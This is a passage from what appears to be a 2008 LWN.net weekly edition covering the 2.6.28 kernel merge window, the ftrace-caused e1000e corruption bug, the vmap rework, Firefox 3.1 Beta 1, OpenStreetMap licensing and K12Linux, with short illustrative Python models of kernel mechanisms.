     after that page is brought back into RAM; this effectively increases
     the amount of swap available on the system.

 Nick Piggin's rewritten vmap
     layer should give significant performance  
     improvements, especially as the number of CPUs on a system grows.

 Huge pages will now be included in core dumps, making the debugging of 
     applications using those pages easier.

 The container freezer
     has been merged.  It is now possible for the system to freeze all
     processes within a container (control group) as a unit.


 The KVM virtualization code has seen a number of improvements,
     including the ability to assign PCI devices to guests and support for
     Intel "Tukwila" processors.

 Kprobes are now supported by the SuperH architecture.

 There is a new ext3 mount option (data_err=abort) which
     causes filesystem operations to abort when I/O errors are
     encountered.  In the absence of this option, the old behavior
     (continue but complain in the system log) remains.

 In-kernel interrupt balancing for 32-bit x86 systems has been
     removed.  This feature has been deprecated (in favor of user-space
     balancing) for some time.


Changes visible to kernel developers include:


 A number of tracing-related patches have been merged.  These include
     the tracepoints
     mechanism, some instrumentation in the core scheduler code, 
     improvements to the ftrace function tracing feature,
     a new ftrace-based stack tracer,
     a new ftrace-based boot (initcall) tracer, and
     the low-level trace
     buffer code.

 The sysctl strategy() function prototype has changed: the
     unused name and nlen parameters have been removed.

 Asynchronous I/O support can now be configured out of the kernel,
     saving about 7KB of space on systems where AIO is not needed.

 As planned, device_create_drvdata() has been renamed to
     device_create(), with the same parameters.

 There is now a mechanism to enable and disable output from
     pr_debug() and dev_dbg() calls on a per-module
     basis.  Control is through a virtual file in debugfs.  There is no
     documentation file associated with this change; instructions on how
     to use this feature can be found in the
     patch changelog.

 The new dev_WARN() function, which takes a device pointer followed by
     a printk()-style format string and its arguments,
     will output the formatted warning, along with a full stack trace.
     This will allow the warnings to be collected at kerneloops.org and incorporated into
     the reports there.

 The new %pR formatting directive allows printk() and
     friends to output the contents of resource structures.

 There is a new function, pci_ioremap_bar(), intended to make life
     easier for PCI driver writers.  This function will remap the entire
     PCI I/O memory region, as selected by the bar argument.


See next week's Kernel Page for a summary of the final days of the 2.6.28
merge window.

		A tale of two conferences


Like many communities, the Linux community depends heavily on conferences
as a way to help our developers and users know each other and work well
together.  We make highly effective use of electronic communications, but
there is truly no substitute for occasionally getting together, sharing a
beer or three, and engaging in some high-bandwidth discussion.  So it
stands to reason we want our events to be as productive and useful as
possible, especially given the expense of participating in them.


Your editor recently had the fortune of attending, over the course of one
week, two conferences which are arguably the oldest and the newest in our
community.  They were both interesting events, but they were very different
in their organization and attendance.  Each shows both strengths and
weaknesses in our organization of face-to-face events.  


Arguably, the first Linux-related event ever was Linux-Kongress 1994.
That gathering brought together developers working
on the Linux kernel for the first time; it played host to a large portion
of the (quite small) development community.  For a period of time thereafter,
Linux-Kongress was the development event for 
people working at or near the kernel level.  It didn't take too long for
other conferences (notably Linux Expo in the US) to grab some of the
spotlight, but, unlike Linux Expo, Linux-Kongress is still an active
conference.  

The 2008 event, in Hamburg, Germany, was well organized and a
lot of fun; it was a pleasant gathering of a part of the community which
your editor visits far too rarely.  It was a technical conference for
technical people, with a number of well-known developers present.  
But it must be said: Linux-Kongress is a small and relatively obscure event
in 2008.  There were maybe 200 attendees; much of the northern European
development community was absent.  Even some developers based in Hamburg
declined to attend.  The quality of the talks was not uniformly good,
though some were excellent.  And, in stark contrast to the recent Linux
Plumbers Conference, it's hard to point at much work that got done.
For something that was once the Linux
development gathering, Linux-Kongress has clearly come down in the world.


It is interesting to observe that Europe, while being the home to large
numbers of free software developers, lacks a definitive development
conference.  That is not to say that no interesting events happen there;
GUADEC and Akademy are probably the biggest desktop conferences, and the
upcoming combined
event is something to look forward to.  But
developers looking for a pan-European, Linux-oriented conference will not find
one.  LinuxConf.eu, a combination of the UKUUG and Linux-Kongress events
held in Cambridge last year, offered the potential to become such an event,
but the LinuxConf.eu idea appears to have stalled for now.


From Hamburg, your editor flew straight to New York City, where the
Linux Foundation's
End-User Summit was held.  This event, happening
for the first time, differs greatly from Linux-Kongress in many ways.  To
begin with, it was an invitation-only event, and one which explicitly
excluded the press (which is why there have been no LWN articles from
there).  It was also intended to host a mixture of developers and users,
and to allow them to talk to each other.  These characteristics led to a
different sort of conference experience.




The invitation-only nature of some Linux Foundation events naturally leads
to complaints.  We do not run an invitation-only community; excluding
people from our conferences seems to run counter to the inclusive
atmosphere we normally try to encourage.  The Linux Foundation's reasoning
here is easy to understand, though: many of the targeted end users (who represent
mainly the financial industry in New York) have a hard time talking about
what they are doing in any setting.  In an open conference with press in
attendance, those people will simply keep their mouths closed - if they
show up at all.


The user community represented by the financial industry is important; they
are a significant part of the business which keeps the enterprise
distributions going.  Even now, they are highly sought after as customers.
It is important to know what they are thinking and what their biggest
difficulties with Linux are.  In the absence of an event like the End-User
Summit, this information will only be communicated directly to the enterprise
distributors under a non-disclosure agreement.  An invitation-only summit
is fundamentally exclusive at one level, but it does help the development
community (as opposed to one or two companies) get a sense for what this
user community is thinking.


So what are they thinking?  They feel some stress between the stability of
enterprise distributions and the desire to have the features developed by
the community in recent years.  They want good tracing mechanisms, but do
not necessarily need the dynamic tracing provided by tools like
DTrace or SystemTap.  They like Linux because its broad hardware support
frees them from reliance on any specific hardware vendor.  They are very
interested in work on next-generation filesystems.  Some of them, at
least, very much want to better understand how our development process
works and, possibly, participate in it.  See the Linux Foundation's press
release for a summary of what was discussed there.


It was a productive gathering, especially once the CEOs got off the stage
and the attendees were able to talk to each other.  But it points out
another thing that we, as a community, lack: there are few forums where
developers and users can get together and learn from each other.
Developers tend to prefer the company of other developers; convincing them
to go to more user-oriented events can be a challenge.  So the closest
thing we have to a combined user/developer event is the single-vendor
conferences held by companies like Red Hat and Novell.  Those, needless to
say, are not the most community-oriented gatherings.  They are not the best
way to learn what our users are thinking.

The proposed LinuxCon event, to be co-located with the 2009 Linux Plumbers
Conference, may help to fill in this gap somewhat.


Our community is blessed with a wealth of interesting gatherings
worldwide.  But that doesn't mean that we can't do better.  Whether the
subject is a true pan-European Linux gathering, user-oriented conferences,
or something else altogether, there are always opportunities to find ways
to help our community be more cohesive and productive.  The trick is to
expand communications to a broader community - as seen in our newest
conference - while growing the open collaborative spirit exemplified by our
oldest one.

		The source of the e1000e corruption bug


When LWN last looked at the
e1000e hardware corruption bug, the source of 
the problem was, at best, unclear.  Problems within the driver itself
seemed like a likely culprit, but it did not take long for those chasing
this problem to realize that they needed to look further afield.  For a while, the
X server came under scrutiny, as did a number of other system components.
When the real problem was found, though, it turned out to be a surprise for
everybody involved.

Tracking down intermittent problems is hard.  When those problems result in
the destruction of hardware, finding them is even harder.  Even the most
dedicated testers tend to balk when faced with the prospect of shipping
their systems back to the manufacturer for repairs.  So the task of finding
this issue fell to Intel; engineers there locked themselves into a lab with
a box full of e1000e adapters and set about bisecting the kernel history to
identify the patch which caused the problem.  Some time (and numerous fried
adapters) later, the bisection process turned up an unlikely suspect: the
ftrace tracing framework.

Developers working on tracing generally put a lot of effort into minimizing
the impact of their code on system performance.  Every last bit of runtime
overhead is scrutinized and eliminated if at all possible.  As a general
rule, bricking the hardware is a level of overhead which goes well beyond
the acceptable parameters.  So 
the ftrace developers, once informed of the bisection result, put in some
significant work of their own to figure out what was going on.

One of the features offered by ftrace is a simple function call tracing
operation; ftrace will output a line with the called function (and
its caller) every time a function call is made.  This tracing is
accomplished by using the venerable profiling mechanism built into gcc (and
most other Unix-based compilers).  When code is compiled with the
-pg option, the compiler will place a call to mcount() at
the beginning of every function.  The version of mcount() provided
by ftrace then logs the relevant information on every call.

As noted above, though, tracing developers are concerned about overhead.
On most systems, it is almost certain that, at any given time, nobody will
be doing function call tracing.  Having all those mcount() calls
happening anyway would be a measurable drag on the system.  So the ftrace
hackers looked for a way to eliminate that overhead when it is not needed.
A naive solution to this problem might be to replace the unconditional call
to mcount() with code, generated by gcc, which tests a global flag and
calls mcount() only when tracing is active.


But the kernel makes a lot of function calls, so even this version
will have a noticeable overhead; it will also bloat the size of the kernel
with all those tests.  So the favored approach tends to be different:
run-time patching.  When function tracing is not being used, the kernel
overwrites all of the mcount() calls with no-op instructions.  As
it happens, doing nothing is a highly optimized operation in contemporary
processors, so the overhead of a few no-ops is nearly zero.  Should
somebody decide to turn function tracing on, the kernel can go through and
patch all of those mcount() calls back in.

Run-time patching can solve the performance problem, but it introduces a
new problem of its own.  Changing the code underneath a running kernel is a
dangerous thing to do; extreme caution is required.  Care must be taken to
ensure that the kernel is not running in the affected code at the time,
processor caches must be invalidated, and so on.  To be safe, it is
necessary to get all other processors on the system to stop and wait while the
patching is taking place.  The end result is that patching the code is an
expensive thing to do.

The way ftrace was coded was to patch out every mcount() call
point as it was discovered through an actual call to mcount().
But, as noted above, run-time patching is very expensive, especially if it
is done a single 
function at a time.  So ftrace would make a list of mcount() call
sites, then fix up a bunch of them later on.  In that way, the cost of
patching out the calls was significantly reduced.

The problem now is that things might have changed between the time when an
mcount() call is noticed and when the kernel gets around to
patching out the call.  It would be very unfortunate if the kernel were to
patch out an mcount() call which no longer existed in the expected
place.  To be absolutely sure that unrelated data was not being corrupted,
the ftrace code used the cmpxchg operation to patch in the
no-ops.  cmpxchg atomically tests the contents of the target
memory against the caller's idea of what is supposed to be there; if the
two do not match, the target location will be left with its old value at
the end of the operation.  So the no-ops will only be written to memory if
the current contents of that memory are a call to mcount().
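
The compare-and-exchange behavior described here is easy to model.  The
sketch below is a plain Python stand-in, with memory represented as a
dictionary and instructions as strings; cmpxchg() and patch_out() are
illustrative names rather than the kernel's functions, and the addresses are
arbitrary.

```python
NOP = "nop"
CALL_MCOUNT = "call mcount"


def cmpxchg(memory, addr, expected, new):
    """Store `new` at addr only if the current contents equal `expected`.

    Returns the value found at addr before the operation.  In this model the
    whole function stands in for a single atomic step.
    """
    old = memory[addr]
    if old == expected:
        memory[addr] = new
    return old


def patch_out(memory, sites):
    """Replace recorded mcount() call sites with no-ops.

    Returns the list of sites which were actually patched.
    """
    return [addr for addr in sites
            if cmpxchg(memory, addr, CALL_MCOUNT, NOP) == CALL_MCOUNT]


memory = {0x100: CALL_MCOUNT, 0x200: "unrelated data", 0x300: CALL_MCOUNT}
patched = patch_out(memory, [0x100, 0x200, 0x300])
```

In this model the stale entry at 0x200 is left untouched, which is exactly
the protection the ftrace code was counting on for ordinary memory.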

This all seems pretty safe, except that it fell down in one obscure, but
important case.  One obvious place where an mcount() call could go
away is in loadable modules.  This can happen if the module is unloaded, of
course, but there is another important case too: any code marked as
initialization code will be removed once initialization is complete.
So a module's initialization function (and any other code marked
__init) could leave a dangling reference in the "mcount()
calls to be patched out" list maintained by ftrace.

The final piece of this puzzle comes from this little fact: on 32-bit
architectures, memory returned from vmalloc() and memory returned from
ioremap() share the same address space.  Both functions create
mappings to memory from the same range of addresses.  Space for loadable
modules is allocated with vmalloc(), so all module code is found
within this shared address space.  Meanwhile, the e1000e driver uses
ioremap() to map the adapter's I/O memory and NVRAM into the kernel's
address space.  The end result is this fatal sequence of events:


 A module is loaded into the system.  As part of the module's
     initialization, a number of mcount() calls are made; these
     call sites are noted for later patching.

 Module initialization completes, and the module's __init
     functions are removed from memory.  The address space they occupied is
     freed up for future use.

 The e1000e driver maps its I/O memory and NVRAM into the address range
     recently occupied by the above-mentioned initialization code.

 Ftrace gets around to patching out the accumulated list of
     mcount() calls.  But some of those "calls" are now, actually,
     I/O memory belonging to the e1000e device.


Remember that the ftrace code was very careful in its patching, using
cmpxchg to avoid overwriting anything which is not an
mcount() call.  But, as Steven Rostedt noted in his summary of the problem:


	The cmpxchg could have saved us in most cases (via luck) - but with
	ioremap-ed memory that was exactly the wrong thing to do - the
	results of cmpxchg on device memory are undefined.  (and will
	likely result in a write)


The end result is a write to the wrong bit of I/O memory - and a destroyed
device.
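
The whole sequence can be replayed in a toy model.  Everything here is a
simplification: the Ram and DeviceMemory classes and the address 0xF800 are
invented for the example, and the device class simply assumes, following
Rostedt's "will likely result in a write", that any cmpxchg aimed at I/O
memory reaches the hardware as a write regardless of the comparison.

```python
CALL_MCOUNT = "call mcount"
NOP = "nop"


class Ram:
    """Ordinary memory cell, where cmpxchg behaves as documented."""
    def __init__(self, value):
        self.value = value

    def cmpxchg(self, expected, new):
        old = self.value
        if old == expected:
            self.value = new
        return old


class DeviceMemory:
    """Toy I/O region: assume every cmpxchg shows up as a write."""
    def __init__(self):
        self.stray_writes = 0

    def cmpxchg(self, expected, new):
        self.stray_writes += 1    # the comparison offers no protection here
        return None


address_space = {}
pending = []      # ftrace's list of call sites to be patched out later

# 1. Module load: an __init function calls mcount(); the site is recorded.
address_space[0xF800] = Ram(CALL_MCOUNT)
pending.append(0xF800)

# 2. Initialization completes and the __init code is freed.
del address_space[0xF800]

# 3. ioremap() hands the same address range to the network adapter.
nic = DeviceMemory()
address_space[0xF800] = nic

# 4. The deferred patching pass runs against the now-stale address.
for addr in pending:
    address_space[addr].cmpxchg(CALL_MCOUNT, NOP)
```

After the last step the model's adapter has received one stray write, even
though the patching code never found an mcount() call at that address.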

In hindsight, this bug is reasonably clear and understandable, but it's not
at all surprising that it took a long time to find.  One should note that
there were, in fact, two different bugs here.  One of them is ftrace's
attempt to write to a stale pointer.  But the other one was just as
important: the e1000e driver should never have left its hardware configured
in a mode where a single stray write could turn it into a brick.  One never
knows where things might go wrong; hardware should never be left in such a
vulnerable state if it can be helped.


The good news is that both bugs have been fixed.  The e1000e hardware was
locked down before 2.6.27 was released, and the 2.6.27.1 update disables
the dynamic ftrace feature.  The ftrace code has been significantly
rewritten for 2.6.28; it no longer records mcount() call sites on
the fly, no longer uses cmpxchg, and, one hopes, is generally
incapable of creating such mayhem again.

		Reworking vmap()


Kernel memory is normally allocated in relatively small chunks - usually
just a single page at a time.  As the size of an allocation grows,
satisfying that allocation with physically-contiguous pages gets
progressively harder.  So most of the kernel has been written with an eye
toward avoiding the use of large, contiguous allocations.  There are times,
though, when a large memory array needs to be virtually contiguous, but not
necessarily physically contiguous.  One example is the allocation of space
for loadable modules; any given module should live in a single, contiguous
address range, but nobody cares how it's laid out in physical RAM.  For
cases like this, the kernel provides a set of functions like
vmalloc() and vmap().

Functions like vmalloc() have long been known to be somewhat
expensive to use.  They have to work with a single shared (and limited)
address range, and they require making changes to the kernel's page
tables.  Page table changes, in turn, require translation lookaside buffer
(TLB) flushes, which are a costly, all-CPUs operation.  So kernel
developers have generally tried to avoid using these functions in
performance-critical parts of the kernel.

Nick Piggin has noticed, though, that the performance characteristics of
vmalloc() and friends are catching up with us.  The
vmalloc() address space is kept on a linked list and protected by
a global lock, which does not scale very well.  But the real cost is in
freeing memory regions in this space; the ensuing TLB flush must be done
using an inter-processor interrupt to every CPU, each of which must then
flush its own TLB.  People normally do not buy more CPUs unless they have
more work to run on them, so systems with more processors will, as a
general rule, be performing more mapping and freeing in the
vmalloc() range.  As systems grow, there will be more global TLB
flushes, each of which disrupts more processors.  In other words, the
amount of work grows in proportion to the square of the number of processors
- meaning that everything falls down, eventually.
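
The quadratic growth can be made concrete with a little arithmetic.  The
sketch below assumes, purely for illustration, that each processor performs
a fixed number of unmap operations and that every unmap triggers a flush on
every processor; the figure of 100 unmaps per CPU is invented.

```python
def tlb_flush_interruptions(cpus, unmaps_per_cpu=100):
    """Total per-CPU interruptions when every unmap flushes every CPU.

    unmaps_per_cpu is an illustrative constant, not a measured value.
    """
    global_flushes = cpus * unmaps_per_cpu  # work scales with CPU count
    return global_flushes * cpus            # each flush hits all CPUs


for n in (1, 2, 4, 8, 16):
    print(n, tlb_flush_interruptions(n))
```

Under these assumptions, quadrupling the number of processors multiplies the
total number of interruptions by sixteen.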

To make things worse, Nick has a longstanding series of patches which,
among other things, do a lot of vmap() calls to support larger
block sizes in the filesystem layer and page cache.  Merging those patches would add
significantly to the amount of time the system spends managing the
vmalloc() space, which would not be a good thing.  So fixing
vmalloc() seems like a good thing to do first.  As of 2.6.28, Nick
has, in fact, fixed the management of kernel virtual allocations.


The first step is to get rid of the linked list.  Instead, a red-black tree
is used to track ranges of available address space; finding a suitable
region can now be done without having to traverse a long list.  The tree is
still protected by a global lock, though, which poses potential scalability
problems.  To avoid
this issue, Nick's patch creates a separate, per-CPU list of small
address ranges which can be allocated and freed in a lockless manner.  New
functions must be called to make use of this facility:


A call to vm_map_ram() will create a virtually-contiguous mapping
for the given pages.  The associated data structures will be
allocated on the given NUMA node; the memory will have the
protection specified in prot.  With the version of the patch
merged for 2.6.28, mappings of up to 64 pages can be made from the
per-cpu lists.

Note that these functions do not allocate memory, they just create a
virtual mapping for a given set of pages.  They are a replacement for
vmap() and vunmap(), not vmalloc() and
vfree().  It is probably possible to rewrite vmalloc() to
use this mechanism, but that has not happened.  So vmalloc() calls
still require the acquisition of a global lock.

There's another trick in this patch set which is used by all of the kernel
virtual address management functions.  Nick realized that it is not
actually necessary to flush TLBs across the system immediately after an
address range is freed.  Since those addresses are being given back to the
system, no code will be making use of them afterward, so it does not matter
if a processor's TLB contains a stale mapping for them.  All that really
matters is that the TLB gets cleaned out before those addresses are used
again elsewhere.   So unmapped regions can be allowed to accumulate, then
all flushed with a single operation.  That cuts the number of TLB flushes
significantly.
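
The effect of deferring the flush can be sketched with a toy model.  The
class, the batching threshold and the range sizes below are hypothetical;
the kernel's actual bookkeeping is more involved.  The model only counts how
many global flushes are needed when unmapped ranges are allowed to pile up.

```python
class VmapArea:
    """Toy model comparing eager and lazy TLB flushing on unmap."""

    def __init__(self, lazy_limit=None):
        self.lazy_limit = lazy_limit  # None means flush on every unmap
        self.pending = []             # unmapped ranges awaiting a flush
        self.reusable = []            # ranges safe to hand out again
        self.global_flushes = 0

    def flush(self):
        # One global flush covers every range accumulated so far.
        if self.pending:
            self.global_flushes += 1
            self.reusable.extend(self.pending)
            self.pending.clear()

    def unmap(self, addr_range):
        self.pending.append(addr_range)
        if self.lazy_limit is None or len(self.pending) >= self.lazy_limit:
            self.flush()

    def allocate(self):
        # Addresses must not be reused until stale TLB entries are gone.
        if not self.reusable:
            self.flush()
        return self.reusable.pop() if self.reusable else None


def count_flushes(lazy_limit, unmaps=1000):
    area = VmapArea(lazy_limit)
    for i in range(unmaps):
        area.unmap((i * 4096, (i + 1) * 4096))
    area.flush()
    return area.global_flushes
```

With these made-up numbers, count_flushes(None) performs one flush per unmap
while count_flushes(64) needs only a handful; the important property is that
allocate() never hands out a range which has not been flushed.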

How much faster do things run?  Nick's patch (the merged version can be
found here)
contains some benchmark results.  With an artificial test aimed at demonstrating
the difference, the new code runs 25 times faster.  By changing the
vmap() code in the XFS filesystem to use vm_map_ram()
instead, some workloads were sped up by a factor of twenty.  So it seems to
work.

		Mozilla releases Firefox 3.1 Beta 1


Version 3.1 Beta 1 of the popular Mozilla
Firefox web browser was
announced
on October 14, 2008.  This is a testing release:


Firefox 3.1 Beta 1 is a public preview release intended  
for developer testing and community feedback. It includes many new  
features as well as improvements to performance, web compatibility,  
and speed. We recommend that you read the release notes and known  
issues before installing this beta.


The release announcement and the Web Developer Feature Overview page
discuss the new capabilities in more detail.  The major new additions include:


 Support has been added for the HTML <video> and <audio> elements using the Ogg Theora and Ogg Vorbis formats.
 Geolocation features have been added, but not in the Linux version (discussed here).
 The Gecko layout engine has some improved web standards implementations.
 More CSS 2.1 and CSS 3 properties have been implemented.
 Support for the CSS @font-face rule has been added (Mac OS X and Windows only), allowing the use of downloadable, user-specified TrueType fonts.
 Support for Access Control for Cross-Site Requests has been added.
 Beta support for Mozilla's TraceMonkey JavaScript engine has been added.
 Some new customizations are available for controlling the Smart Location Bar.
 JavaScript web worker threads are being worked on.
 New graphics, SVG and CSS capabilities are being added.
 Improvements have been made to the browser tabs including:
 
   A new "Open a new tab" button has been added to the tab bar.
   Support for switching between tabs with Ctrl-Tab has been added.
   Tabs can now be dragged and dropped between Firefox windows.
 
More features are planned for the official Firefox 3.1 release.


Your author spent an entire day doing his normal LWN work using
Firefox 3.1 Beta 1 on an Ubuntu 8.04 system.
The only problem that showed up was
choppy and aliased audio playback when viewing some of the recommended
test videos.
Otherwise, the browser worked well.


Firefox 3.1 Beta 1 is available for download here; it is a good idea to
read the release notes first.


		OpenStreetMap contemplates licensing


Maps are cool; there's no end of applications which can make good use of
mapping data.  There is plenty of map data around, but it's almost
exclusively proprietary in nature.  That makes this data hard to use with
free applications; it's also inherently annoying.  We, as taxpayers, own
those streets; why should we have to pay somebody else to know where the
streets are?


Your editor likes to grumble about such things; meanwhile, the OpenStreetMap project (OSM) is busily
doing something about it.  OSM has put together a database and a set of
tools making it easy for anybody to enter location data with the intent of
producing a free mapping database with global coverage.  It is an ambitious
project, to say the least, but it's working:


	Right now on each and every day, 25,000km of roads gets added to
	the OpenStreetMap database, on the historical trend that will be
	over 200,000km per day by the end of 2009. And that doesn't include
	all the other data that makes OpenStreetMap the richest dataset
	available online.


OSM data is not limited to roads; just about any point or
track of interest can be added to the database.  If current trends
continue, OSM could well grow into the most extensive geolocation database
anywhere - free or proprietary.  And those trends could well continue; one
of the nice aspects of this kind of project is that no particular expertise
is needed to contribute.  All you need is a GPS receiver and some time; some OSM
local groups have even acquired a set of receivers to lend out to
interested volunteers.  This is our planet, and we can all help to map it.


All this work raises an interesting question, though: under what license
should this accumulated data be distributed?  Currently, the OSM database
is covered by the Creative Commons
Attribution-ShareAlike 2.0 license.  It is a copyleft-style license,
requiring that derived products be made available under the same license.
So, for example, if a GPS navigator manufacturer were to include an
enhanced version of the OSM database in its products, it would have to
release the enhanced version under the CC by-SA license.


The OSM project is not happy with this license, though, and is looking to
make a change.  The attribution requirement is ambiguous in this context;
do users need to credit every OSM contributor?  Does making a plot of OSM
data with added data layered on top create a derived product?  But the
scariest question is a different one: can the CC by-SA license cover the
OSM database at all?


Copyright law covers creative expression, not facts.  The information in
the OSM database is almost entirely factual in nature; one cannot copyright
the location of a street corner.  So what OSM is trying to protect is not
the individual locations, but the database as a whole.  Copyright law does
allow for the protection of databases, but that law is far more complex
than the law for pure creative works, and it varies far more between
jurisdictions.  Europe has a specific (though much-derided) database right,
the US has far weaker
database protections, and other parts of the planet lack this
protection altogether.  So it may well be that, if some evil corporation
decides to appropriate the OSM database for its own nefarious, proprietary
purposes, there will be nothing that the OSM project can do about it.


So the project is thinking of making a switch to the Open
Database License (ODbL), which is still being developed.  It, too, is a
copyleft-style license, but it is crafted to make use of whatever database
protection is available in a given jurisdiction.  To that end, the ODbL is
explicitly structured as a contract between the database owner and the
user.  In any jurisdiction where database rights are not recognized under
copyright law, the
contractual nature of the ODbL should provide a legal basis to go after
license violators.

But the use of contract law muddies the water considerably; there are good
reasons why free software licenses are carefully written to avoid that
path.  Contracts are only valid if they are explicitly and voluntarily
entered into by all parties.  If OSM cannot show that a license
violator agreed to abide by the license, it has no case under contract
law.  The project has
a plan to address this problem:


	To ensure that potential users are aware of and agree to the
	contract terms, we are proposing to require a click-through
	agreement before downloading data. (All registered users would
	agree to this on signing up so will not need a further
	click-through on each download.)


Registration and clickthrough licensing are obnoxious, to say the least.
But, in any case, the only people who will go through that process are
those who obtain the database directly from OpenStreetMap.  The ODbL allows
redistribution, naturally, and it does not require that explicit agreement
be obtained from recipients of the database.  So it is hard to see an
outcome where copies of the database lacking a "signed" contract do not
proliferate.  Additionally, reliance on contract law makes it
very hard to get injunctive relief, weakening any enforcement efforts
considerably. 


The ODbL includes an anti-DRM measure; if a vendor locks down a copy of the
database with some sort of DRM scheme, that vendor must also make an
unrestricted copy available.  This license tries to distinguish between
"collective databases" (which are not derived works) and "derivative
databases" (which are).  Drawing layers on top of an OSM-based map is a
collective work; tracing lines from such a map is a derivative work.  It
is, in general, a complex bit of work.

It is complex enough that a number of OSM contributors are wondering if
it's all worth it.  Jordan Hatcher is one of the authors of the ODbL, and
he supports its use with OSM, but even he understands the concerns that some people
have:


	The [Science Commons] point is that all this sort of stuff can be a
	real pain, and isn't what you are really doing is wanting to create
	and manipulate factual data? Why spend all the time on this when
	the innovation happens in what you can do with the data, and not
	with trying to protect the data in the first place.


There is an active group within OSM which is opposed to this kind of
licensing and would, in fact, rather just get down to the task of
collecting and distributing the data.  They express
themselves in terms like this:


	One thing I really love about OSM is the pragmatic, un-political
	approach: You don't give us your data, fine, then we create our own
	and you can shove it.

	Not: You don't give us your data, fine, then we create a complex
	legal licensing framework that will ultimately get you bogged down
	in so many requests by prospective users who would like to use our
	data and yours but cannot and you will sooner or later have to
	release your data according to the terms we dictate and then we
	will have won and the world will be a better place.


These contributors would rather that OSM release its data into the public
domain - or something very close to that.  Rather than put together a
complicated license, they prefer to just publish their data for anybody to
use as they see fit.  There have been all of the usual discussions which
resemble any "GPL vs. BSD" licensing flame war one has ever seen - except
that the OSM folks appear to be a very polite crowd.  It comes down to the
usual question: will the OSM database become more complete and useful if
those who extend it are forced to contribute back their changes?

The public domain contingent clearly does not believe that any improvements
to the database obtained via licensing constraints will be worth the
trouble.  So it seems likely that there will be some sort of fork involving
the creation of a smaller, purely public-domain OSM database.  It may well
be an in-house fork, with the public domain data being merged into the
larger, more restrictively licensed database for distribution.  Regardless
of how that goes, this split raises issues of its own: how are the two
databases to be kept distinct in the face of cooperative additions and
edits?

Any relicensing of the database also brings up another interesting
question: what to do about all of the existing data, which may or may not
be copyrighted by those who contributed or edited it?  The license change
may well require a process of getting assent from all contributors and
purging data obtained from those who do not agree.  This
proposed timeline shows how the project is thinking about working
through this task.  It is hard to imagine this process going entirely
smoothly. 


The OSM community clearly has a set of thorny issues to work out.  Given
that, it's not surprising that this process has already been dragged out
over the better part of a year.  How this issue is eventually resolved will
certainly serve as an example - not necessarily a good example - for other
projects working on free compilations of factual data.  
Let us hope that OSM can come to a
solution which lets this project continue to grow and generate a valuable
database that we all will benefit from.

		K12Linux - Fedora 9 with LTSP


The K12Linux project
builds on the efforts of K12LTSP, which
started working with the Linux Terminal Server Project (LTSP) on Red Hat Linux before switching to Fedora and
CentOS.  The newly named K12Linux project recently announced the release of K12Linux Release Candidate 1.

The Linux Terminal Server Project 
provides software that adds thin-client support to Linux distributions.
The project's documentation
page has pointers to using LTSP with Ubuntu, openSUSE, Fedora and
Debian, along with instructions for Integrating
LTSP-5 into your favorite Linux distribution.  LTSP provides server
and client software for a single server and many thin clients or diskless
terminals.  This can be an inexpensive way to provide files and
applications for many users.  While often used in schools, LTSP has many
other applications as well.

K12 refers to the US primary and secondary school system, in which children
start their education in Kindergarten (from the German) and go through grade
12 before going on to a university.  This brings us back to K12Linux, the new name
for continuing efforts to integrate LTSP with Fedora.  Currently these
efforts are focused on LTSP 5 and Fedora 9.

This RC release contains Fedora 9 and all updates as of October 12, 2008,
with LTSP-5.1.26, ldm-2.0.13, ltspfs-0.5.5, many bug fixes and new
K12Linux-themed artwork for the login screen.  This release comes as a live
image suitable for a USB key or a DVD, both with the client chroot already
installed and configured.  If you are already running Fedora 9 and would
like to try this release you can use the instructions in the install
guide instead of the live media.  Either way, if you are looking for an
easy way to get LTSP running, give K12Linux a try.

		Closing out the 2.6.28 merge window


About 1000 changesets were merged after the previous summary was posted
here.  Many of those came from architecture-specific trees.  Other changes
merged this time around include:


 There are new drivers for 
     Mellanox ConnectX 10GbE network adapters,
     PowerPC PPC40x and PPC44x GPIO controllers,
     Panasonic "Let's Note" laptop special keys,
     Sharp SL-6000 backlight and LCD devices,
     Dialog Semiconductor DA9030/DA9034 backlight devices,
     Tabletkiosk Sahara Touch-iT backlight devices, and
     Toshiba TX4939 SoC ATA controllers.


 One more not-ready-for-prime-time driver was merged via the staging 
     tree; this one supports Redrapids Pocket Change cardbus devices.  The
     staging tree also brought an extensive set of fixes to the drivers
     added earlier in the merge window.


 The kernel has gained support for ultra-wideband
     protocol stacks.  UWB can be used for normal networking, but the
     immediate application is wireless USB, which will be
     supported in 2.6.28.


 The ACPI docking station code has gained support for bay and battery
     hotplug  events.

 The IA64 architecture now supports Xen.  Also added to IA64 is support
     for DMA remapping devices (IOMMUs).

 Support for kdump has
     been added to the PowerPC architecture.

 The 9P (Plan9) filesystem now has RDMA support.


Changes visible to kernel developers include:


 There is a new core_param() macro:


     Its purpose is to define "core" parameters and let them be
     represented in /sys/module/kernel/parameters.

 It is now possible to create a workqueue running at realtime priority
     with:


 The block driver API has changed considerably, with the inode 
     and file parameters being removed from most block device
     operations.  The new API looks like this:


    The new prototypes do away with the file and inode
    structure pointers which were passed in previous kernels.
    Note that the ioctl() method is now called without the big
    kernel lock; code needing BKL protection must explicitly define a
    locked_ioctl() function instead.

 The range timer API
     has been merged; callers can now specify a time period in which they
     would like the timeout to be delivered.  The kernel can then take
     advantage of the range to coalesce wakeups and keep the processor idle
     for longer periods.
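
The benefit of giving the kernel a range rather than a single expiry time
can be sketched as an interval problem.  The function below is hypothetical
and is not how the kernel's timer code is implemented; it simply shows that
when each timer accepts any moment within (earliest, latest), several timers
can share one wakeup.

```python
def coalesce_wakeups(timers):
    """Return wakeup times so that each (earliest, latest) range holds one.

    Greedy interval stabbing: fire as late as the most urgent timer
    allows, and let every timer whose range covers that moment share it.
    """
    wakeups = []
    for earliest, latest in sorted(timers, key=lambda t: t[1]):
        if not wakeups or wakeups[-1] < earliest:
            wakeups.append(latest)
    return wakeups


# Five timers with slack need only two wakeups in this made-up example.
ranged = [(10, 20), (15, 25), (18, 30), (40, 50), (45, 46)]
print(coalesce_wakeups(ranged))

# The same timers with no slack each need their own wakeup.
exact = [(20, 20), (25, 25), (30, 30), (50, 50), (46, 46)]
print(coalesce_wakeups(exact))
```

Fewer wakeups mean longer uninterrupted idle periods, which is the point of
the range timer API.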


This time around, linux-next maintainer Stephen Rothwell has put together
a list of linux-next patches
which did not get into 2.6.28.  Perhaps the biggest omission was the credentials work, which seemed
poised to go in this time around.  Other changes which failed to get merged
include the message catalog
code (which looks like it will need a change of approach) and TOMOYO Linux (which seems to be caught
up in the same old "new security module with pathname-based rules" swamp).  

Now the stabilization period starts.  Linus, perhaps, was trying to set the
tone for this development cycle when he released a much smaller and earlier
2.6.28-rc2 than would have
